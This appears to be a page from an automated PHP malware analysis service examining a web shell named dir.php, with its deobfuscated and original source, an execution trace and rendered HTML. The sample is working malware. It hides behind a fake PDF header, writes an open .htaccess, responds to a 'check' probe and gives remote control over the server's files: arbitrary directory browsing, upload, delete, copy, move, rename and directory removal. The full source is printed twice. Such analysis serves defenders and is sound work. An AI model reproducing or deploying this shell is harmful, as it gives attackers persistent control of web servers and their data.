PHP Malware Analysis
dir.php
md5: 8116021dd67e98967085d0f5414010ea
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
%PDF-1.7
4 0 obj
<?php
if (isset($_GET['check'])) {
echo "checked";
exit;
}
if (!file_exists(".htaccess")) {
$text = "\r\nAllow from all\r\nOptions -Indexes\r\n ";
$fp = fopen(".htaccess", "w");
fwrite($fp, $text);
fclose($fp);
}
?>
<html><body>
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
$dir = getcwd();
} else {
$dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd() . "<br>";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
$mode = $_GET['mode'];
switch ($mode) {
case 'delete':
$file = $_GET['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET['old'];
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (!empty($file)) {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
if (is_dir($file)) {
$items = scandir($file);
$items_num = count($items) - 2;
echo "<tr><td><a href = " . $current . "/" . $file . ">" . $file . "</a></td>";
echo "<td>" . $items_num . " Items</td>";
echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>";
echo "<td>-</td>";
echo "<td>-</td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>";
}
}
foreach ($files as $file) {
if (is_file($file)) {
$size = round(filesize($file) / 1024, 2);
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $size . " KB</td>";
echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>";
echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>";
echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>";
}
}
echo "</table><br>";Execution traces
data/traces/8116021dd67e98967085d0f5414010ea_trace-1676256188.7634.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:43:34.661254]
1 0 1 0.000248 393512
1 3 0 0.000443 420488 {main} 1 /var/www/html/uploads/dir.php 0 0
2 4 0 0.000462 420488 file_exists 0 /var/www/html/uploads/dir.php 11 1 '.htaccess'
2 4 1 0.000482 420528
2 4 R TRUE
2 5 0 0.000496 420488 error_reporting 0 /var/www/html/uploads/dir.php 46 1 0
2 5 1 0.000509 420528
2 5 R 22527
2 6 0 0.000522 420488 set_time_limit 0 /var/www/html/uploads/dir.php 47 1 0
2 6 1 0.000536 420552
2 6 R FALSE
2 7 0 0.000549 420520 getcwd 0 /var/www/html/uploads/dir.php 50 0
2 7 1 0.000562 420568
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 50 $dir = '/var/www/html/uploads'
2 8 0 0.000589 420568 chdir 0 /var/www/html/uploads/dir.php 54 1 '/var/www/html/uploads'
2 8 1 0.000604 420656
2 8 R TRUE
2 9 0 0.000618 420696 htmlentities 0 /var/www/html/uploads/dir.php 55 1 '/uploads/dir.php?dir=/var/www/html/uploads'
2 9 1 0.000633 420888
2 9 R '/uploads/dir.php?dir=/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 55 $current = '/uploads/dir.php?dir=/var/www/html/uploads'
2 10 0 0.000662 420776 getcwd 0 /var/www/html/uploads/dir.php 58 0
2 10 1 0.000674 420824
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/dir.php 67 $mode = NULL
2 11 0 0.000702 420776 clearstatcache 0 /var/www/html/uploads/dir.php 144 0
2 11 1 0.000714 420776
2 11 R NULL
2 12 0 0.000727 420776 scandir 0 /var/www/html/uploads/dir.php 147 1 '/var/www/html/uploads'
2 12 1 0.000757 421392
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 147 $files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
2 13 0 0.000793 421360 is_dir 0 /var/www/html/uploads/dir.php 149 1 '.'
2 13 1 0.000808 421408
2 13 R TRUE
2 14 0 0.000820 421368 scandir 0 /var/www/html/uploads/dir.php 150 1 '.'
2 14 1 0.000842 421984
2 14 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 150 $items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/dir.php 151 $items_num = 4
2 15 0 0.000889 421952 is_dir 0 /var/www/html/uploads/dir.php 149 1 '..'
2 15 1 0.000903 421992
2 15 R TRUE
2 16 0 0.000915 421952 scandir 0 /var/www/html/uploads/dir.php 150 1 '..'
2 16 1 0.000937 422456
2 16 R [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/dir.php 150 $items = [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/dir.php 151 $items_num = 1
2 17 0 0.000977 421840 is_dir 0 /var/www/html/uploads/dir.php 149 1 '.htaccess'
2 17 1 0.000991 421888
2 17 R FALSE
2 18 0 0.001004 421848 is_dir 0 /var/www/html/uploads/dir.php 149 1 'data'
2 18 1 0.001017 421880
2 18 R TRUE
2 19 0 0.001030 421840 scandir 0 /var/www/html/uploads/dir.php 150 1 'data'
2 19 1 0.001051 422368
2 19 R [0 => '.', 1 => '..', 2 => 'trace-1676256188.7634.xt.gz']
1 A /var/www/html/uploads/dir.php 150 $items = [0 => '.', 1 => '..', 2 => 'trace-1676256188.7634.xt.gz']
1 A /var/www/html/uploads/dir.php 151 $items_num = 1
2 20 0 0.001094 421864 is_dir 0 /var/www/html/uploads/dir.php 149 1 'dir.php'
2 20 1 0.001107 421904
2 20 R FALSE
2 21 0 0.001119 421864 is_dir 0 /var/www/html/uploads/dir.php 149 1 'prepend.php'
2 21 1 0.001133 421912
2 21 R FALSE
2 22 0 0.001145 421872 is_file 0 /var/www/html/uploads/dir.php 161 1 '.'
2 22 1 0.001159 421904
2 22 R FALSE
2 23 0 0.001171 421864 is_file 0 /var/www/html/uploads/dir.php 161 1 '..'
2 23 1 0.001184 421904
2 23 R FALSE
2 24 0 0.001196 421864 is_file 0 /var/www/html/uploads/dir.php 161 1 '.htaccess'
2 24 1 0.001210 421912
2 24 R TRUE
2 25 0 0.001222 421872 filesize 0 /var/www/html/uploads/dir.php 162 1 '.htaccess'
2 25 1 0.001234 421912
2 25 R 64
2 26 0 0.001247 421872 round 0 /var/www/html/uploads/dir.php 162 2 0.0625 2
2 26 1 0.001260 421944
2 26 R 0.06
1 A /var/www/html/uploads/dir.php 162 $size = 0.06
2 27 0 0.001291 421872 is_file 0 /var/www/html/uploads/dir.php 161 1 'data'
2 27 1 0.001305 421904
2 27 R FALSE
2 28 0 0.001317 421864 is_file 0 /var/www/html/uploads/dir.php 161 1 'dir.php'
2 28 1 0.001330 421904
2 28 R TRUE
2 29 0 0.001343 421864 filesize 0 /var/www/html/uploads/dir.php 162 1 'dir.php'
2 29 1 0.001354 421904
2 29 R 5249
2 30 0 0.001366 421864 round 0 /var/www/html/uploads/dir.php 162 2 5.1259765625 2
2 30 1 0.001378 421936
2 30 R 5.13
1 A /var/www/html/uploads/dir.php 162 $size = 5.13
2 31 0 0.001403 421864 is_file 0 /var/www/html/uploads/dir.php 161 1 'prepend.php'
2 31 1 0.001418 421912
2 31 R TRUE
2 32 0 0.001430 421872 filesize 0 /var/www/html/uploads/dir.php 162 1 'prepend.php'
2 32 1 0.001442 421912
2 32 R 57
2 33 0 0.001454 421872 round 0 /var/www/html/uploads/dir.php 162 2 0.0556640625 2
2 33 1 0.001466 421944
2 33 R 0.06
1 A /var/www/html/uploads/dir.php 162 $size = 0.06
1 3 1 0.001492 421872
0.001519 315776
TRACE END [2023-02-13 00:43:34.662668]
Generated HTML code
<html><head></head><body>%PDF-1.7
4 0 obj
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<i>Server: localhost<br>Current directory: /var/www/html<br>Software: Apache/2.4.52 (Ubuntu)<br><br><form action="/dir.php?dir=/var/www/html&mode=upload" method="POST" enctype="multipart/form-data">
Local file: <input type="file" name="upload_file"><input type="submit" value="Upload"></form><br><pre>
</pre><table width="100%">
<tbody><tr><td><a href="/dir.php?dir=/var/www/html/.">.</a></td><td>3 Items</td><td><a href="/dir.php?dir=/var/www/html&mode=rmdir&rm=.">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=.">Rename directory</a></td></tr><tr><td><a href="/dir.php?dir=/var/www/html/..">..</a></td><td>2 Items</td><td><a href="/dir.php?dir=/var/www/html&mode=rmdir&rm=..">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=..">Rename directory</a></td></tr><tr><td>.htaccess</td><td>0.04 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=.htaccess">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=.htaccess">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=.htaccess">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=.htaccess">Remame</a></td></tr><tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=beneri.se_malware_analysis">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=beneri.se_malware_analysis">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=beneri.se_malware_analysis">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=beneri.se_malware_analysis">Remame</a></td></tr><tr><td>dir.php</td><td>5.13 KB</td><td><a href="/dir.php?dir=/var/www/html&mode=delete&file=dir.php">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&mode=copy&src=dir.php">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&mode=move&src=dir.php">Move</a></td><td><a href="/dir.php?dir=/var/www/html&mode=rename&old=dir.php">Remame</a></td></tr></tbody></table><br></i></body></html>Original PHP code
%PDF-1.7
4 0 obj
<?php
if (isset ($_GET['check'])) {
echo "checked";
exit;
}
if (!file_exists(".htaccess")) {
$text = "
Allow from all
Options -Indexes
";
$fp = fopen(".htaccess", "w");
fwrite($fp, $text);
fclose($fp);
}
?>
<html><body>
<style type="text/css">
body{
background: #ffffff;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #269771;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
} else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd () . "<br>";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
$mode = $_GET ['mode'];
switch ($mode) {
case 'delete':
$file = $_GET ['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (!empty ($file)) {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
}
clearstatcache ();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_dir ($file)){
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td><a href = ".$current . "/" . $file.">".$file."</a></td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>";
echo "<td>-</td>";
echo "<td>-</td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>";
}
}
foreach ($files as $file){
if (is_file ($file)){
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>";
}
}
echo "</table><br>";